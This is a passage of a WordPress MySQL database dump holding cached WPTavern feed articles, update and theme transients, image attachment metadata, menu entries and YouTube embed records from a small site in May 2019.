build a Gutenberg plugin for the open source OctoberCMS, which is based on Laravel. OctobeCMS was launched in 2015, and still captures only a tiny sliver of the CMS market share, but it is growing in popularity among the top one million websites, according to stats from <a href="https://trends.builtwith.com/cms/October-CMS" rel="noopener noreferrer" target="_blank">BuiltWith</a>. The CMS has a growing ecosystem of more than 700 themes and plugins.</p>\n<p>The <a href="https://octobercms.com/plugin/reazzon-gutenberg" rel="noopener noreferrer" target="_blank">Gutenberg for OctoberCMS</a> plugin is now in beta. It allows developers to embed Gutenberg in the backend via their own model by <a href="https://octobercms.com/docs/database/relations#polymorphic-relations" rel="noopener noreferrer" target="_blank">creating a Polymorphic relation</a>. The plugin integrates Laraberg but all of its blocks are standard from the Gutenberg.js package. It doesn&#8217;t include anything custom. </p>\n<p>Most aspects of Gutenberg are working in the beta, including common blocks, formatting, layout, and embed blocks, custom styles, and block settings. </p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/gutenberg-october-cms.png?ssl=1"><img /></a></p>\n<p>None of WordPress&#8217; standard widgets work in the plugin and Khaetsky said he plans to remove them in future updates.</p>\n<p>Anything that requires media uploading, such as the gallery block, inline images, and cover block, are not working. Khaetsky said he is working on getting the plugin integrated with the native OctoberCMS Medialibrary. He encouraged anyone who wants to contribute to that effort to submit a PR to the plugin&#8217;s <a href="https://github.com/FlusherDock1/Gutenberg" rel="noopener noreferrer" target="_blank">GitHub repository</a>. </p>\n<p>Khaetsky&#8217;s free plugin is MIT-licensed and available in the official OctoberCMS plugin marketplace. The plugin&#8217;s adoption is limited to developers who know how to implement it, but it already has 39 installations. <a href="https://octobercms.com/plugin/reazzon-gutenberg" rel="noopener noreferrer" target="_blank">Documentation</a> is available on the plugin listing.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 03 May 2019 23:01:10 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:49;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:97:"WPTavern: Block Options Plugin Rebrands to EditorsKit, Expands Beyond Block Visibility Management";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=89273";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:107:"https://wptavern.com/block-options-plugin-rebrands-to-editorskit-expands-beyond-block-visibility-management";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2816:"<p>WordPress plugin developer <a href="https://jeffreycarandang.com" rel="noopener noreferrer" target="_blank">Jeffrey Carandang</a> has rebranded his <a href="https://wordpress.org/plugins/block-options/" rel="noopener noreferrer" target="_blank">Block Options</a> plugin to <a href="https://editorskit.com/" rel="noopener noreferrer" target="_blank">EditorsKit</a>. Carandang created Block Options prior to co-founding CoBlocks, which was recently <a href="https://wptavern.com/godaddy-acquires-themebeans-coblocks-block-gallery-and-block-unit-tests" rel="noopener noreferrer" target="_blank">acquired by GoDaddy</a>. It began as a plugin for controlling block visibility, inspired by his <a href="https://widget-options.com/" rel="noopener noreferrer" target="_blank">Widget Options</a> plugin, but has since grown to include more features for managing Gutenberg blocks. EditorsKit now offers the following capabilities:</p>\n<ul>\n<li>Devices Visibility Options</li>\n<li>User Login State Visibility</li>\n<li>Display Logic</li>\n<li>Advanced Custom Fields Integration</li>\n<li>Block Guide Lines</li>\n</ul>\n<p>&#8220;As much as I love the name &#8216;Block Options,&#8217; it has started to become too generic and has been used a lot on the Gutenberg editor itself,&#8221; Carandang said. &#8220;So, I have decided to change the name to something that stands out and fits the purpose more – page building block options for the new editor.</p>\n<p>&#8220;The name EditorsKit came from &#8216;Editor’s Toolkit.&#8217; I’ve been progressively moving towards building a set of tools that will help users navigate through the editor more conveniently, besides giving them visibility control.&#8221;</p>\n<p>Version 1.4 of the plugin introduces the new Block Guide Lines feature, one of the features to go beyond visibility management. It allows users to toggle guide lines on/off for titles and editor blocks to check element boundaries. Carandang said the feature becomes especially useful when handling nested blocks.</p>\n<p></p>\n<p>The last major release of the plugin also improves the UI and UX with a new “Visibility Settings” modal for managing all visibilities in the same place. The modal includes an &#8220;Advanced&#8221; tab for more complicated options that are more likely to be used by developers, such as custom display logic and ACF visibility support.</p>\n<p>Under the umbrella of its new branding and <a href="https://editorskit.com/" rel="noopener noreferrer" target="_blank">website</a>, Carandang plans to expand EditorsKit to include more tools, with the next set focused on developers. Next on the roadmap is a setting to toggle Auto Save on/off and theme support for page template body classes.</p>\n<p>Check out a quick preview of the improved interface and new features below:</p>\n<p></p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 03 May 2019 20:35:54 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}}}}}}}}}}}}s:4:"type";i:128;s:7:"headers";O:42:"Requests_Utility_CaseInsensitiveDictionary":1:{s:7:"\0*\0data";a:8:{s:6:"server";s:5:"nginx";s:4:"date";s:29:"Mon, 27 May 2019 01:36:50 GMT";s:12:"content-type";s:8:"text/xml";s:4:"vary";s:15:"Accept-Encoding";s:13:"last-modified";s:29:"Mon, 27 May 2019 01:15:28 GMT";s:15:"x-frame-options";s:10:"SAMEORIGIN";s:4:"x-nc";s:9:"HIT ord 2";s:16:"content-encoding";s:4:"gzip";}}s:5:"build";s:14:"20190526014313";}', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(769, '_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1558961198', 'no'),
(770, '_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1558917998', 'no'),
(771, '_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b', '1558961198', 'no'),
(772, '_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b', '<div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://wordpress.org/news/2019/05/wordpress-5-2-1-maintenance-release/''>WordPress 5.2.1 Maintenance Release</a></li></ul></div><div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://wptavern.com/in-case-you-missed-it-issue-24''>WPTavern: In Case You Missed It – Issue 24</a></li><li><a class=''rsswidget'' href=''https://wptavern.com/new-github-sponsors-tool-draws-concerns-from-open-source-community''>WPTavern: New GitHub Sponsors Tool Draws Concerns from Open Source Community</a></li><li><a class=''rsswidget'' href=''https://wptavern.com/automattic-acquires-prospress-the-company-behind-woocommerce-subscriptions''>WPTavern: Automattic Acquires Prospress, the company behind WooCommerce Subscriptions</a></li></ul></div>', 'no'),
(841, '_site_transient_timeout_browser_5ac71600cc9c7fa82bbc370cd02eb16b', '1559524977', 'no'),
(842, '_site_transient_browser_5ac71600cc9c7fa82bbc370cd02eb16b', 'a:10:{s:4:"name";s:7:"Firefox";s:7:"version";s:4:"67.0";s:8:"platform";s:7:"Windows";s:10:"update_url";s:24:"https://www.firefox.com/";s:7:"img_src";s:44:"http://s.w.org/images/browsers/firefox.png?1";s:11:"img_src_ssl";s:45:"https://s.w.org/images/browsers/firefox.png?1";s:15:"current_version";s:2:"56";s:7:"upgrade";b:0;s:8:"insecure";b:0;s:6:"mobile";b:0;}', 'no'),
(843, '_site_transient_timeout_community-events-8d18721bc55b518b3839f8a99a6dd5d8', '1558963379', 'no'),
(844, '_site_transient_community-events-8d18721bc55b518b3839f8a99a6dd5d8', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"172.17.217.0";}s:6:"events";a:1:{i:0;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:15:"WordCamp Europe";s:3:"url";s:33:"https://2019.europe.wordcamp.org/";s:6:"meetup";s:0:"";s:10:"meetup_url";s:0:"";s:4:"date";s:19:"2019-06-20 00:00:00";s:8:"location";a:4:{s:8:"location";s:15:"Berlin, Germany";s:7:"country";s:2:"DE";s:8:"latitude";d:52.506970000000003;s:9:"longitude";d:13.2843064;}}}}', 'no'),
(887, '_site_transient_update_themes', 'O:8:"stdClass":4:{s:12:"last_checked";i:1558928031;s:7:"checked";a:41:{s:23:"advance-ecommerce-store";s:3:"0.4";s:18:"bb-ecommerce-store";s:5:"1.3.5";s:15:"blossom-fashion";s:5:"1.2.0";s:14:"buzz-ecommerce";s:5:"1.1.1";s:10:"chandigarh";s:3:"1.3";s:15:"creative-agency";s:5:"1.0.0";s:13:"di-responsive";s:5:"1.0.6";s:15:"e-commerce-shop";s:5:"0.2.3";s:14:"ecommerce-lite";s:5:"1.2.0";s:15:"education-xpert";s:5:"1.0.0";s:9:"educenter";s:5:"1.1.1";s:12:"fashion-diva";s:5:"1.0.0";s:10:"flash-blog";s:5:"1.0.1";s:14:"flatmagazinews";s:3:"1.7";s:6:"garuda";s:5:"1.0.0";s:8:"griddist";s:3:"1.3";s:5:"inbox";s:5:"1.0.7";s:9:"just-pink";s:5:"1.4.6";s:7:"labbook";s:5:"1.1.8";s:14:"minimal-blocks";s:5:"1.0.0";s:19:"modern-storytelling";s:3:"1.0";s:8:"openness";s:5:"1.0.0";s:11:"parole-2015";s:5:"1.0.3";s:7:"parvati";s:5:"1.0.0";s:10:"rcg-forest";s:5:"2.2.1";s:7:"refresh";s:3:"1.9";s:8:"salinger";s:5:"1.1.3";s:8:"shopical";s:5:"1.0.5";s:12:"shoppingcart";s:5:"1.0.5";s:9:"storement";s:5:"1.0.0";s:6:"taleem";s:5:"1.0.3";s:11:"twenty8teen";s:8:"20190506";s:13:"twentyfifteen";s:3:"2.5";s:14:"twentyfourteen";s:3:"2.7";s:14:"twentynineteen";s:3:"1.3";s:15:"twentyseventeen";s:3:"2.1";s:13:"twentysixteen";s:3:"1.9";s:9:"twentyten";s:3:"2.9";s:12:"twentytwelve";s:3:"3.0";s:17:"vw-ecommerce-shop";s:5:"0.3.7";s:7:"vw-kids";s:5:"0.3.1";}s:8:"response";a:3:{s:14:"twentynineteen";a:4:{s:5:"theme";s:14:"twentynineteen";s:11:"new_version";s:3:"1.4";s:3:"url";s:44:"https://wordpress.org/themes/twentynineteen/";s:7:"package";s:60:"https://downloads.wordpress.org/theme/twentynineteen.1.4.zip";}s:15:"twentyseventeen";a:4:{s:5:"theme";s:15:"twentyseventeen";s:11:"new_version";s:3:"2.2";s:3:"url";s:45:"https://wordpress.org/themes/twentyseventeen/";s:7:"package";s:61:"https://downloads.wordpress.org/theme/twentyseventeen.2.2.zip";}s:13:"twentysixteen";a:4:{s:5:"theme";s:13:"twentysixteen";s:11:"new_version";s:3:"2.0";s:3:"url";s:43:"https://wordpress.org/themes/twentysixteen/";s:7:"package";s:59:"https://downloads.wordpress.org/theme/twentysixteen.2.0.zip";}}s:12:"translations";a:0:{}}', 'no'),
(888, '_site_transient_update_plugins', 'O:8:"stdClass":5:{s:12:"last_checked";i:1558921507;s:7:"checked";a:3:{s:19:"akismet/akismet.php";s:5:"4.1.1";s:33:"classic-editor/classic-editor.php";s:3:"1.5";s:9:"hello.php";s:5:"1.7.1";}s:8:"response";a:2:{s:19:"akismet/akismet.php";O:8:"stdClass":12:{s:2:"id";s:21:"w.org/plugins/akismet";s:4:"slug";s:7:"akismet";s:6:"plugin";s:19:"akismet/akismet.php";s:11:"new_version";s:5:"4.1.2";s:3:"url";s:38:"https://wordpress.org/plugins/akismet/";s:7:"package";s:56:"https://downloads.wordpress.org/plugin/akismet.4.1.2.zip";s:5:"icons";a:2:{s:2:"2x";s:59:"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272";s:2:"1x";s:59:"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272";}s:7:"banners";a:1:{s:2:"1x";s:61:"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904";}s:11:"banners_rtl";a:0:{}s:6:"tested";s:5:"5.2.1";s:12:"requires_php";b:0;s:13:"compatibility";O:8:"stdClass":0:{}}s:9:"hello.php";O:8:"stdClass":12:{s:2:"id";s:25:"w.org/plugins/hello-dolly";s:4:"slug";s:11:"hello-dolly";s:6:"plugin";s:9:"hello.php";s:11:"new_version";s:5:"1.7.2";s:3:"url";s:42:"https://wordpress.org/plugins/hello-dolly/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip";s:5:"icons";a:2:{s:2:"2x";s:64:"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855";s:2:"1x";s:64:"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855";}s:7:"banners";a:1:{s:2:"1x";s:66:"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855";}s:11:"banners_rtl";a:0:{}s:6:"tested";s:5:"5.2.1";s:12:"requires_php";b:0;s:13:"compatibility";O:8:"stdClass":0:{}}}s:12:"translations";a:0:{}s:9:"no_update";a:1:{s:33:"classic-editor/classic-editor.php";O:8:"stdClass":9:{s:2:"id";s:28:"w.org/plugins/classic-editor";s:4:"slug";s:14:"classic-editor";s:6:"plugin";s:33:"classic-editor/classic-editor.php";s:11:"new_version";s:3:"1.5";s:3:"url";s:45:"https://wordpress.org/plugins/classic-editor/";s:7:"package";s:61:"https://downloads.wordpress.org/plugin/classic-editor.1.5.zip";s:5:"icons";a:2:{s:2:"2x";s:67:"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671";s:2:"1x";s:67:"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671";}s:7:"banners";a:2:{s:2:"2x";s:70:"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671";s:2:"1x";s:69:"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676";}s:11:"banners_rtl";a:0:{}}}}', 'no'),
(906, 'category_children', 'a:0:{}', 'yes'),
(926, '_site_transient_timeout_theme_roots', '1558929828', 'no'),
(927, '_site_transient_theme_roots', 'a:41:{s:23:"advance-ecommerce-store";s:7:"/themes";s:18:"bb-ecommerce-store";s:7:"/themes";s:15:"blossom-fashion";s:7:"/themes";s:14:"buzz-ecommerce";s:7:"/themes";s:10:"chandigarh";s:7:"/themes";s:15:"creative-agency";s:7:"/themes";s:13:"di-responsive";s:7:"/themes";s:15:"e-commerce-shop";s:7:"/themes";s:14:"ecommerce-lite";s:7:"/themes";s:15:"education-xpert";s:7:"/themes";s:9:"educenter";s:7:"/themes";s:12:"fashion-diva";s:7:"/themes";s:10:"flash-blog";s:7:"/themes";s:14:"flatmagazinews";s:7:"/themes";s:6:"garuda";s:7:"/themes";s:8:"griddist";s:7:"/themes";s:5:"inbox";s:7:"/themes";s:9:"just-pink";s:7:"/themes";s:7:"labbook";s:7:"/themes";s:14:"minimal-blocks";s:7:"/themes";s:19:"modern-storytelling";s:7:"/themes";s:8:"openness";s:7:"/themes";s:11:"parole-2015";s:7:"/themes";s:7:"parvati";s:7:"/themes";s:10:"rcg-forest";s:7:"/themes";s:7:"refresh";s:7:"/themes";s:8:"salinger";s:7:"/themes";s:8:"shopical";s:7:"/themes";s:12:"shoppingcart";s:7:"/themes";s:9:"storement";s:7:"/themes";s:6:"taleem";s:7:"/themes";s:11:"twenty8teen";s:7:"/themes";s:13:"twentyfifteen";s:7:"/themes";s:14:"twentyfourteen";s:7:"/themes";s:14:"twentynineteen";s:7:"/themes";s:15:"twentyseventeen";s:7:"/themes";s:13:"twentysixteen";s:7:"/themes";s:9:"twentyten";s:7:"/themes";s:12:"twentytwelve";s:7:"/themes";s:17:"vw-ecommerce-shop";s:7:"/themes";s:7:"vw-kids";s:7:"/themes";}', 'no');

-- --------------------------------------------------------

--
-- Table structure for table `wp_postmeta`
--

CREATE TABLE IF NOT EXISTS `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8_general_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8_general_ci
) ENGINE=InnoDB AUTO_INCREMENT=1584 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_postmeta`
--

INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1, 2, '_wp_page_template', 'default'),
(2, 3, '_wp_page_template', 'default'),
(3, 5, '_edit_last', '1'),
(4, 5, '_edit_lock', '1558922837:1'),
(5, 7, '_wp_attached_file', '2019/05/skru.jpg'),
(6, 7, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:309;s:6:"height";i:163;s:4:"file";s:16:"2019/05/skru.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"skru-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"skru-300x158.jpg";s:5:"width";i:300;s:6:"height";i:158;s:9:"mime-type";s:10:"image/jpeg";}s:32:"twentyseventeen-thumbnail-avatar";a:4:{s:4:"file";s:16:"skru-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(7, 5, '_oembed_9103d1e422e35b4472849b91c024f5ef', '<iframe width="525" height="295" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(8, 5, '_oembed_time_9103d1e422e35b4472849b91c024f5ef', '1558836125'),
(9, 5, '_oembed_7ecd8232c7f035e80cc934911ad4f965', '{{unknown}}'),
(10, 11, '_wp_attached_file', '2019/05/logoSKRU-S-1.png'),
(11, 11, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:350;s:6:"height";i:448;s:4:"file";s:24:"2019/05/logoSKRU-S-1.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"logoSKRU-S-1-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:24:"logoSKRU-S-1-234x300.png";s:5:"width";i:234;s:6:"height";i:300;s:9:"mime-type";s:9:"image/png";}s:32:"twentyseventeen-thumbnail-avatar";a:4:{s:4:"file";s:24:"logoSKRU-S-1-100x100.png";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(12, 17, '_edit_last', '1'),
(13, 17, '_edit_lock', '1558921930:1'),
(71, 26, '_menu_item_type', 'taxonomy'),
(72, 26, '_menu_item_menu_item_parent', '0'),
(73, 26, '_menu_item_object_id', '5'),
(74, 26, '_menu_item_object', 'category'),
(75, 26, '_menu_item_target', ''),
(76, 26, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(77, 26, '_menu_item_xfn', ''),
(78, 26, '_menu_item_url', ''),
(80, 27, '_menu_item_type', 'taxonomy'),
(81, 27, '_menu_item_menu_item_parent', '0'),
(82, 27, '_menu_item_object_id', '6'),
(83, 27, '_menu_item_object', 'category'),
(84, 27, '_menu_item_target', ''),
(85, 27, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(86, 27, '_menu_item_xfn', ''),
(87, 27, '_menu_item_url', ''),
(89, 28, '_menu_item_type', 'taxonomy'),
(90, 28, '_menu_item_menu_item_parent', '0'),
(91, 28, '_menu_item_object_id', '7'),
(92, 28, '_menu_item_object', 'category'),
(93, 28, '_menu_item_target', ''),
(94, 28, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(95, 28, '_menu_item_xfn', ''),
(96, 28, '_menu_item_url', ''),
(98, 29, '_menu_item_type', 'taxonomy'),
(99, 29, '_menu_item_menu_item_parent', '0'),
(100, 29, '_menu_item_object_id', '8'),
(101, 29, '_menu_item_object', 'category'),
(102, 29, '_menu_item_target', ''),
(103, 29, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(104, 29, '_menu_item_xfn', ''),
(105, 29, '_menu_item_url', ''),
(107, 30, '_menu_item_type', 'taxonomy'),
(108, 30, '_menu_item_menu_item_parent', '0'),
(109, 30, '_menu_item_object_id', '9'),
(110, 30, '_menu_item_object', 'category'),
(111, 30, '_menu_item_target', ''),
(112, 30, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(113, 30, '_menu_item_xfn', ''),
(114, 30, '_menu_item_url', ''),
(116, 31, '_menu_item_type', 'taxonomy'),
(117, 31, '_menu_item_menu_item_parent', '0'),
(118, 31, '_menu_item_object_id', '10'),
(119, 31, '_menu_item_object', 'category'),
(120, 31, '_menu_item_target', ''),
(121, 31, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(122, 31, '_menu_item_xfn', ''),
(123, 31, '_menu_item_url', ''),
(125, 32, '_menu_item_type', 'taxonomy'),
(126, 32, '_menu_item_menu_item_parent', '0'),
(127, 32, '_menu_item_object_id', '11'),
(128, 32, '_menu_item_object', 'category'),
(129, 32, '_menu_item_target', ''),
(130, 32, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(131, 32, '_menu_item_xfn', ''),
(132, 32, '_menu_item_url', ''),
(134, 33, '_menu_item_type', 'taxonomy'),
(135, 33, '_menu_item_menu_item_parent', '0'),
(136, 33, '_menu_item_object_id', '12'),
(137, 33, '_menu_item_object', 'category'),
(138, 33, '_menu_item_target', ''),
(139, 33, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(140, 33, '_menu_item_xfn', ''),
(141, 33, '_menu_item_url', ''),
(143, 34, '_menu_item_type', 'taxonomy'),
(144, 34, '_menu_item_menu_item_parent', '0'),
(145, 34, '_menu_item_object_id', '13'),
(146, 34, '_menu_item_object', 'category'),
(147, 34, '_menu_item_target', ''),
(148, 34, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(149, 34, '_menu_item_xfn', ''),
(150, 34, '_menu_item_url', ''),
(152, 35, '_menu_item_type', 'taxonomy'),
(153, 35, '_menu_item_menu_item_parent', '0'),
(154, 35, '_menu_item_object_id', '14'),
(155, 35, '_menu_item_object', 'category'),
(156, 35, '_menu_item_target', ''),
(157, 35, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(158, 35, '_menu_item_xfn', ''),
(159, 35, '_menu_item_url', ''),
(162, 5, '_oembed_e52417ef1b0283a3b4ba515e0791c4ed', '<iframe width="640" height="360" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(163, 5, '_oembed_time_e52417ef1b0283a3b4ba515e0791c4ed', '1558838829'),
(164, 36, '_customize_restore_dismissed', '1'),
(165, 5, '_oembed_a20cc3eb373ba1491831b562d24e85c7', '<iframe width="840" height="473" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(166, 5, '_oembed_time_a20cc3eb373ba1491831b562d24e85c7', '1558839007'),
(176, 5, '_oembed_ca153e493837fc7109418b93b3b0d501', '<iframe width="474" height="267" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(177, 5, '_oembed_time_ca153e493837fc7109418b93b3b0d501', '1558839424'),
(178, 38, '_menu_item_type', 'post_type'),
(179, 38, '_menu_item_menu_item_parent', '0'),
(180, 38, '_menu_item_object_id', '5'),
(181, 38, '_menu_item_object', 'page'),
(182, 38, '_menu_item_target', ''),
(183, 38, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(184, 38, '_menu_item_xfn', ''),
(185, 38, '_menu_item_url', ''),
(187, 5, '_wp_page_template', 'default'),
(188, 5, '_oembed_0b305d585ede61377315f7e1c281f937', '<iframe width="925" height="520" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(189, 5, '_oembed_time_0b305d585ede61377315f7e1c281f937', '1558839799'),
(190, 40, '_edit_last', '1'),
(191, 40, '_edit_lock', '1558852278:1'),
(192, 41, '_wp_attached_file', '2019/05/person25.jpg'),
(193, 41, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:781;s:6:"height";i:1219;s:4:"file";s:20:"2019/05/person25.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"person25-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"person25-192x300.jpg";s:5:"width";i:192;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"person25-768x1199.jpg";s:5:"width";i:768;s:6:"height";i:1199;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"person25-656x1024.jpg";s:5:"width";i:656;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:15:"openness-recent";a:4:{s:4:"file";s:18:"person25-80x80.jpg";s:5:"width";i:80;s:6:"height";i:80;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"1";s:8:"keywords";a:0:{}}}'),
(200, 5, '_oembed_557688c221a87bb2307bd3459a26d0e0', '<iframe width="660" height="371" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(201, 5, '_oembed_time_557688c221a87bb2307bd3459a26d0e0', '1558840169'),
(202, 5, '_oembed_3783b86017a4e48b771d5f844be4e171', '<iframe width="520" height="293" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(203, 5, '_oembed_time_3783b86017a4e48b771d5f844be4e171', '1558841969'),
(208, 5, '_oembed_5c4d638154cf01278a4f7c99688a099b', '<iframe width="1170" height="658" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(209, 5, '_oembed_time_5c4d638154cf01278a4f7c99688a099b', '1558844252'),
(210, 5, '_oembed_54004f504f4812eb148daf4152ac78ce', '<iframe width="800" height="450" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(211, 5, '_oembed_time_54004f504f4812eb148daf4152ac78ce', '1558845127'),
(212, 5, '_oembed_eb8b70366b7d16e0972557b99b3e3cdc', '<iframe width="730" height="411" src="https://www.youtube.com/embed/0uxQkIus27A?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'),
(213, 5, '_oembed_time_eb8b70366b7d16e0972557b99b3e3cdc', '1558845258'),
